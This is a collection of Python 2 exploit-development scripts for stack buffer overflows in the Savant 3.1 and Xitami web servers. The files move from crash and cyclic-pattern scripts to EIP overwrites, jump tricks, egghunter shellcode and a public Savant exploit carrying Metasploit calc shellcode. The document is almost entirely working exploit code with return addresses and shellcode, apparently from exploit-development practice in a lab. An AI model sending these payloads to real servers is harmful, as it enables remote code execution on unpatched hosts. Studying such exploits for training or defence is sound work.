BoF/savant_3.1_10434/savant_10434_crash_conditional_jump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "\xcc" 8 | badbuffer += "\x41" * (254 - len(badbuffer)) 9 | badbuffer += "\x09\x1d\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 10 | httpmethod = "\x70\x71\x72\x73\x74\x75\x78\x79\x7A\x7B" # Test for working conditional jumps 11 | 12 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 13 | 14 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | connect=sock.connect((target_address,target_port)) 16 | sock.send(sendbuf) 17 | sock.close() 18 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_crash_eip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5" 8 | httpmethod = "GET" 9 | 10 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 11 | 12 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | connect=sock.connect((target_address,target_port)) 14 | sock.send(sendbuf) 15 | sock.close() 16 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_crash_eip_overwrite.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "A" * 254 8 | badbuffer += "\x09\x1d\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 9 | httpmethod = "\xcc" 10 | 11 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 12 | 13 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 14 | connect=sock.connect((target_address,target_port)) 15 | sock.send(sendbuf) 16 | sock.close() 17 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_crash_eip_overwrite_short_25_jump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "A" * 254 8 | badbuffer += "\x09\x1d\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 9 | httpmethod = "\xEB\x19" # SHORT JUMP 0X19 10 | 11 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 12 | 13 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 14 | connect=sock.connect((target_address,target_port)) 15 | sock.send(sendbuf) 16 | sock.close() 17 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_egghunter_1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | buffer2 = "R0cX" + "R0cX" + "\xcc" * 992 8 | 9 | badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # egghunter searching for R0cX 10 | badbuffer += "\x90" * (254 - len(badbuffer)) 11 | badbuffer += "\x09\x1D\x40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETN 12 | httpmethod = "\xb0\x03\x04\x01\x7B\x14" # MOV AL, 3; ADD AL, 1; JPO 14 13 | 14 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2 15 | 16 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | connect=sock.connect((target_address,target_port)) 18 | sock.send(sendbuf) 19 | sock.close() 20 | 21 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_jmp_instructions.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "\xcc" 8 | badbuffer += "\x41" * (254 - len(badbuffer)) 9 | badbuffer += "\x09\x1d\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 10 | httpmethod = "\xb0\x03\x04\x01\x7B\x14" # MOV AL, 3; ADD AL, 1; JPO 14 11 | 12 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 13 | 14 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | connect=sock.connect((target_address,target_port)) 16 | sock.send(sendbuf) 17 | sock.close() 18 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_pub_exploit_10434.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Title: Savant web server 3.1 buffer overflow exploit 4 | #Version: 3.1 5 | #Tested on: win xp sp3 6 | #Vulnerability discovered by Muts(offensive security) 7 | #\x83\xc4\x50\x54\xc3 -add esp,50 push esp ret[see the double dance of this in exploit] 8 | #ret=00401D09[pop ebp, ret] 9 | 10 | 11 | import socket,sys 12 | # win calc.exe [metasploit] (172 byte) 13 | host = sys.argv[1] 14 | buff = ("\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8" 15 | "\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1" 16 | "\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07" 17 | "\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25" 18 | "\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5" 19 | "\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d" 20 | "\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4" 21 | "\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0" 22 | "\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c" 23 | "\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b" 24 | "\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4") 25 | buff3 = "\x90" * 30 26 | buff2 = "\x90" * 53 27 | ret = "\x09\x1D\x40" #savant.exe 28 | buffr = '\x83\xC4\x50\x54\xc3 /' +buff2+buff3+buff+ret + '\r\n\r\n' 29 | print buffr 30 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 31 | s.connect((host,80)) 32 | s.send(buffr) 33 | sys.exit() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_18401/savant_18401_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | banner = """ 5 | #----------------------------------------------# 6 | Savant Exploit - Egghunter 7 | #----------------------------------------------# 8 | """ 9 | 10 | target_address="192.168.37.131" 11 | target_port=80 12 | 13 | badbuffer = "A"*258 14 | httpmethod = "GET" 15 | 16 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 17 | 18 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 19 | connect=sock.connect((target_address, target_port)) 20 | sock.send(sendbuf) 21 | sock.close() 22 | 23 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_18401/savant_18401_crash_cyclic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | banner = """ 5 | #----------------------------------------------# 6 | Savant Exploit - Egghunter 7 | #----------------------------------------------# 8 | """ 9 | 10 | target_address="192.168.37.131" 11 | target_port=80 12 | 13 | badbuffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5" 14 | httpmethod = "GET" 15 | 16 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 17 | 18 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 19 | connect=sock.connect((target_address, target_port)) 20 | sock.send(sendbuf) 21 | sock.close() 22 | 23 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_18401/savant_18401_crash_cyclic_jmp_esp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | banner = """ 5 | #----------------------------------------------# 6 | Savant Exploit - Egghunter 7 | #----------------------------------------------# 8 | """ 9 | 10 | target_address="192.168.37.131" 11 | target_port=80 12 | 13 | badbuffer = "A"*254 14 | badbuffer += "\x09\x1D\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 15 | httpmethod = "\xcc" 16 | 17 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 18 | 19 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 20 | connect=sock.connect((target_address, target_port)) 21 | sock.send(sendbuf) 22 | sock.close() 23 | 24 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_18401/savant_18401_crash_cyclic_withb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | banner = """ 5 | #----------------------------------------------# 6 | Savant Exploit - Egghunter 7 | #----------------------------------------------# 8 | """ 9 | 10 | target_address="192.168.37.131" 11 | target_port=80 12 | 13 | badbuffer = "A"*254 + "B"*4 14 | httpmethod = "GET" 15 | 16 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 17 | 18 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 19 | connect=sock.connect((target_address, target_port)) 20 | sock.send(sendbuf) 21 | sock.close() 22 | 23 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_18401/savant_18401_hunter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | banner = """ 5 | #----------------------------------------------# 6 | Savant Exploit - Egghunter 7 | #----------------------------------------------# 8 | """ 9 | 10 | target_address="192.168.37.131" 11 | target_port=80 12 | 13 | buffer2 = "R0cX" + "R0cX" + "\xcc" * 992 14 | 15 | badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 16 | badbuffer += "\x90"*(254-len(badbuffer)) 17 | badbuffer += "\x09\x1D\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 18 | httpmethod = "\xb0\x03\x04\x01\x7B\x15" # MOV AL, 3; ADD AL, 1; JPO 15 19 | 20 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2 21 | 22 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | connect=sock.connect((target_address, target_port)) 24 | sock.send(sendbuf) 25 | sock.close() 26 | 27 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_18401/savant_18401_jmp_around.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | banner = """ 5 | #----------------------------------------------# 6 | Savant Exploit - Egghunter 7 | #----------------------------------------------# 8 | """ 9 | 10 | target_address="192.168.37.131" 11 | target_port=80 12 | 13 | badbuffer = "\xcc" 14 | badbuffer += "A"*(254-len(badbuffer)) 15 | badbuffer += "\x09\x1D\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 16 | httpmethod = "\xb0\x03\x04\x01\x7B\x15" # MOV AL, 3; ADD AL, 1; JPO 15 17 | 18 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 19 | 20 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | connect=sock.connect((target_address, target_port)) 22 | sock.send(sendbuf) 23 | sock.close() 24 | 25 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_18401/savant_18401_short_jmp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | banner = """ 5 | #----------------------------------------------# 6 | Savant Exploit - Egghunter 7 | #----------------------------------------------# 8 | """ 9 | 10 | target_address="192.168.37.131" 11 | target_port=80 12 | 13 | badbuffer = "\xcc" 14 | badbuffer += "A"*(254-len(badbuffer)) 15 | badbuffer += "\x09\x1D\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 16 | httpmethod = "\xeb\x19" 17 | 18 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 19 | 20 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | connect=sock.connect((target_address, target_port)) 22 | sock.send(sendbuf) 23 | sock.close() 24 | 25 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/1st/xitami_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import time 3 | import socket 4 | import sys 5 | 6 | if len(sys.argv) != 3: 7 | print "Usage: ./xitami.py " 8 | sys.exit(1) 9 | 10 | target = sys.argv[1] 11 | port = int(sys.argv[2]) 12 | 13 | buf = "A" * 100 14 | 15 | header = ( 16 | 'GET / HTTP/1.1\r\n' 17 | 'Host: %s\r\n' 18 | 'If-Modified-Since: pwned, %s\r\n' 19 | '\r\n') % (target, buf) 20 | 21 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | try: 23 | s.connect((target, port)) 24 | print "[+] Connected" 25 | except: 26 | print "[!] Connection Failed" 27 | sys.exit(0) 28 | 29 | print "[+] Sending payload..." 30 | s.send(header) 31 | time.sleep(1) 32 | s.close() 33 | 34 | print "[+] Check port 1337 for your shell" 35 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/1st/xitami_egghunt.py: -------------------------------------------------------------------------------- 1 | import time 2 | import socket 3 | import sys 4 | 5 | if len(sys.argv) != 3: 6 | print "Usage: ./xitami.py " 7 | sys.exit(1) 8 | 9 | target = sys.argv[1] 10 | port = int(sys.argv[2]) 11 | 12 | egghunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02" 13 | "\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" 14 | "w00t" # 4 byte tag 15 | "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") 16 | 17 | jump = "\xeb\x22" # short jump 18 | 19 | buf = "A" * 72 20 | buf += "\xD7\x30\x9D\x7C" # jmp esp (user32.dll) / XP SP3 English 21 | buf += jump 22 | buf += "\x90" * 50 23 | buf += egghunt 24 | buf += "w00tw00t" # tag 25 | buf += "\x90" * 50 26 | 27 | header = ( 28 | 'GET / HTTP/1.1\r\n' 29 | 'Host: %s\r\n' 30 | 'If-Modified-Since: pwned, %s\r\n' 31 | '\r\n') % (target, buf) 32 | 33 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 34 | try: 35 | s.connect((target, port)) 36 | print "[+] Connected" 37 | except: 38 | print "[!] Connection Failed" 39 | sys.exit(0) 40 | 41 | print "[+] Sending payload..." 42 | s.send(header) 43 | time.sleep(1) 44 | s.close() 45 | 46 | print "[+] Check port 1337 for your shell" -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/1st/xitami_eip.py: -------------------------------------------------------------------------------- 1 | import time 2 | import socket 3 | import sys 4 | 5 | if len(sys.argv) != 3: 6 | print "Usage: ./xitami.py " 7 | sys.exit(1) 8 | 9 | target = sys.argv[1] 10 | port = int(sys.argv[2]) 11 | 12 | buf = "A" * 72 13 | buf += "B" * 4 14 | 15 | header = ( 16 | 'GET / HTTP/1.1\r\n' 17 | 'Host: %s\r\n' 18 | 'If-Modified-Since: pwned, %s\r\n' 19 | '\r\n') % (target, buf) 20 | 21 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | try: 23 | s.connect((target, port)) 24 | print "[+] Connected" 25 | except: 26 | print "[!] Connection Failed" 27 | sys.exit(0) 28 | 29 | print "[+] Sending payload..." 30 | s.send(header) 31 | time.sleep(1) 32 | s.close() 33 | 34 | print "[+] Check port 1337 for your shell" -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/1st/xitami_jmp.py: -------------------------------------------------------------------------------- 1 | import time 2 | import socket 3 | import sys 4 | 5 | if len(sys.argv) != 3: 6 | print "Usage: ./xitami.py " 7 | sys.exit(1) 8 | 9 | target = sys.argv[1] 10 | port = int(sys.argv[2]) 11 | 12 | jump = "\xeb\x22" # short jump 13 | 14 | buf = "A" * 72 15 | buf += "\xD7\x30\x9D\x7C" # jmp esp (user32.dll) / XP SP3 English 16 | buf += jump 17 | buf += "\x90" * 50 18 | buf += "ABCD" 19 | 20 | header = ( 21 | 'GET / HTTP/1.1\r\n' 22 | 'Host: %s\r\n' 23 | 'If-Modified-Since: pwned, %s\r\n' 24 | '\r\n') % (target, buf) 25 | 26 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | try: 28 | s.connect((target, port)) 29 | print "[+] Connected" 30 | except: 31 | print "[!] Connection Failed" 32 | sys.exit(0) 33 | 34 | print "[+] Sending payload..." 35 | s.send(header) 36 | time.sleep(1) 37 | s.close() 38 | 39 | print "[+] Check port 1337 for your shell" -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/1st/xitami_pattern.py: -------------------------------------------------------------------------------- 1 | import time 2 | import socket 3 | import sys 4 | 5 | if len(sys.argv) != 3: 6 | print "Usage: ./xitami.py " 7 | sys.exit(1) 8 | 9 | target = sys.argv[1] 10 | port = int(sys.argv[2]) 11 | 12 | buf = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9" 13 | 14 | header = ( 15 | 'GET / HTTP/1.1\r\n' 16 | 'Host: %s\r\n' 17 | 'If-Modified-Since: pwned, %s\r\n' 18 | '\r\n') % (target, buf) 19 | 20 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | try: 22 | s.connect((target, port)) 23 | print "[+] Connected" 24 | except: 25 | print "[!] Connection Failed" 26 | sys.exit(0) 27 | 28 | print "[+] Sending payload..." 29 | s.send(header) 30 | time.sleep(1) 31 | s.close() 32 | 33 | print "[+] Check port 1337 for your shell" -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/1st/xitami_ppr.py: -------------------------------------------------------------------------------- 1 | import time 2 | import socket 3 | import sys 4 | 5 | if len(sys.argv) != 3: 6 | print "Usage: ./xitami.py " 7 | sys.exit(1) 8 | 9 | target = sys.argv[1] 10 | port = int(sys.argv[2]) 11 | 12 | buf = "A" * 72 13 | buf += "\xD7\x30\x9D\x7C" # jmp esp (user32.dll) / XP SP3 English 14 | buf += "\x90" * 50 15 | 16 | header = ( 17 | 'GET / HTTP/1.1\r\n' 18 | 'Host: %s\r\n' 19 | 'If-Modified-Since: pwned, %s\r\n' 20 | '\r\n') % (target, buf) 21 | 22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | try: 24 | s.connect((target, port)) 25 | print "[+] Connected" 26 | except: 27 | print "[!] Connection Failed" 28 | sys.exit(0) 29 | 30 | print "[+] Sending payload..." 31 | s.send(header) 32 | time.sleep(1) 33 | s.close() 34 | 35 | print "[+] Check port 1337 for your shell" -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/2nd/b.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Xitami Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./xitami.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | buf = "A" * 72 + "B" * 4 20 | 21 | header = ( 22 | 'GET / HTTP/1.1\r\n' 23 | 'Host: %s\r\n' 24 | 'If-Modified-Since: pwned, %s\r\n' 25 | '\r\n') % (target, buf) 26 | 27 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | try: 29 | s.connect((target, port)) 30 | print "[+] Connected" 31 | except: 32 | print "[!] Connection Failed" 33 | sys.exit(0) 34 | 35 | print "[+] Sending payload..." 36 | s.send(header) 37 | time.sleep(1) 38 | s.close() 39 | 40 | print "[+] Check port 1337 for your shell" 41 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/2nd/back.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Xitami Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./xitami.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | #jmp esp 0x7c86467b in kernel32.dll 20 | 21 | buf = "A" * 72 + "\x7b\x46\x86\x7c" + "\xEB\x22" + "\x90" * 50 + "ABCD" 22 | 23 | header = ( 24 | 'GET / HTTP/1.1\r\n' 25 | 'Host: %s\r\n' 26 | 'If-Modified-Since: pwned, %s\r\n' 27 | '\r\n') % (target, buf) 28 | 29 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | try: 31 | s.connect((target, port)) 32 | print "[+] Connected" 33 | except: 34 | print "[!] Connection Failed" 35 | sys.exit(0) 36 | 37 | print "[+] Sending payload..." 38 | s.send(header) 39 | time.sleep(1) 40 | s.close() 41 | 42 | print "[+] Check port 1337 for your shell" 43 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/2nd/crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Xitami Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./xitami.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | buf = "A"*500 20 | 21 | header = ( 22 | 'GET / HTTP/1.1\r\n' 23 | 'Host: %s\r\n' 24 | 'If-Modified-Since: pwned, %s\r\n' 25 | '\r\n') % (target, buf) 26 | 27 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | try: 29 | s.connect((target, port)) 30 | print "[+] Connected" 31 | except: 32 | print "[!] Connection Failed" 33 | sys.exit(0) 34 | 35 | print "[+] Sending payload..." 36 | s.send(header) 37 | time.sleep(1) 38 | s.close() 39 | 40 | print "[+] Check port 1337 for your shell" 41 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/2nd/egghunt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Xitami Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./xitami.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | #jmp esp 0x7c86467b in kernel32.dll 20 | 21 | egghunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02" 22 | "\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" 23 | "w00t" # 4 byte tag 24 | "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") 25 | 26 | buf = "A" * 72 + "\x7b\x46\x86\x7c" + "\xEB\x22" + "\x90" * 50 + egghunt + "w00tw00t" + "\x90" * 50 27 | 28 | header = ( 29 | 'GET / HTTP/1.1\r\n' 30 | 'Host: %s\r\n' 31 | 'If-Modified-Since: pwned, %s\r\n' 32 | '\r\n') % (target, buf) 33 | 34 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 35 | try: 36 | s.connect((target, port)) 37 | print "[+] Connected" 38 | except: 39 | print "[!] Connection Failed" 40 | sys.exit(0) 41 | 42 | print "[+] Sending payload..." 43 | s.send(header) 44 | time.sleep(1) 45 | s.close() 46 | 47 | print "[+] Check port 1337 for your shell" 48 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/2nd/jmpesp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Xitami Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./xitami.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | #jmp esp 0x7c86467b in kernel32.dll 20 | 21 | buf = "A" * 72 + "\x7b\x46\x86\x7c" + "B" * 4 22 | 23 | header = ( 24 | 'GET / HTTP/1.1\r\n' 25 | 'Host: %s\r\n' 26 | 'If-Modified-Since: pwned, %s\r\n' 27 | '\r\n') % (target, buf) 28 | 29 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | try: 31 | s.connect((target, port)) 32 | print "[+] Connected" 33 | except: 34 | print "[!] Connection Failed" 35 | sys.exit(0) 36 | 37 | print "[+] Sending payload..." 38 | s.send(header) 39 | time.sleep(1) 40 | s.close() 41 | 42 | print "[+] Check port 1337 for your shell" 43 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/2nd/pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Xitami Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./xitami.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | buf = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq" 20 | 21 | header = ( 22 | 'GET / HTTP/1.1\r\n' 23 | 'Host: %s\r\n' 24 | 'If-Modified-Since: pwned, %s\r\n' 25 | '\r\n') % (target, buf) 26 | 27 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | try: 29 | s.connect((target, port)) 30 | print "[+] Connected" 31 | except: 32 | print "[!] Connection Failed" 33 | sys.exit(0) 34 | 35 | print "[+] Sending payload..." 36 | s.send(header) 37 | time.sleep(1) 38 | s.close() 39 | 40 | print "[+] Check port 1337 for your shell" 41 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/2nd/xitami.spk: -------------------------------------------------------------------------------- 1 | s_string("GET"); 2 | s_string(" "); 3 | s_string("/favicon.ico"); 4 | s_string("HTTP/1.1"); 5 | s_string("\r\n"); 6 | s_string("Host: "); 7 | 